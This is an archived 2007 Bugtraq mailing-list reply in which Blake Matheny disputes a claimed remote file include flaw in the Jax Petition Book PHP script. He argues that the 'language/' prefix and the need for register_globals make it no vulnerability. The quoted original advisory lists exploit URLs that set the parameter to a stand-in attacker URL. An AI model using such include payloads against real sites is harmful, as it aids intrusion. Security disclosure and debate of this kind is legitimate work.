lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Date: Mon, 15 Jan 2007 14:13:05 -0800
From: bmatheny@...ocracy.net
To: ilkerkandemir@...et.com
Cc: bugtraq@...urityfocus.com
Subject: Re: Jax Petition Book (languagepack) Remote File Include Vulnerabilities

This is not a vulnerability. Since $languagepack is prefixed by "language/",
the PHP stream handler will simply try to open a local file. Also, you can
only modify $languagepack if register_globals is on, which, it rarely is
these days.

Can we stop with the PHP 'vulnerabilities' that aren't?

-Blake

Whatchu talkin' 'bout, Willis?
> ------------------------------------------------------------------------------------------------------------------
> 
> AYYILDIZ.ORG PreSents...
> 
> 
> *Script: Jax Petition Book
> *Download: jtr.de/scripting/php/guestbook/petitionbook%20v1.0.3.06.zip
> 
> *Contact: ilker Kandemir <ilkerkandemir[at]mynet.com>
> 
> -------------------------------------------------------------------------------------------------------------------
> 
> *Code:
> 
> require ( "language/" .$languagepack . ".inc.php" );
> 
> -------------------------------------------------------------------------------------------------------------------
> 
> *Exploit: 
> 
> jax_petitionbook.php?languagepack=http://attacker.txt?
> smileys.php?languagepack=http://attacker.txt?
> 
> -------------------------------------------------------------------------------------------------------------------
> 
> Tnx:H0tturk,Dr.Max Virus,Asianeagle,PcDelisi,CodeR,Dum?nci
> Special Tnx: AYYILDIZ.ORG

-- 
Blake Matheny
bmatheny@...ocracy.net
http://mobocracy.net

Content of type "application/pgp-signature" skipped

Powered by blists - more mailing lists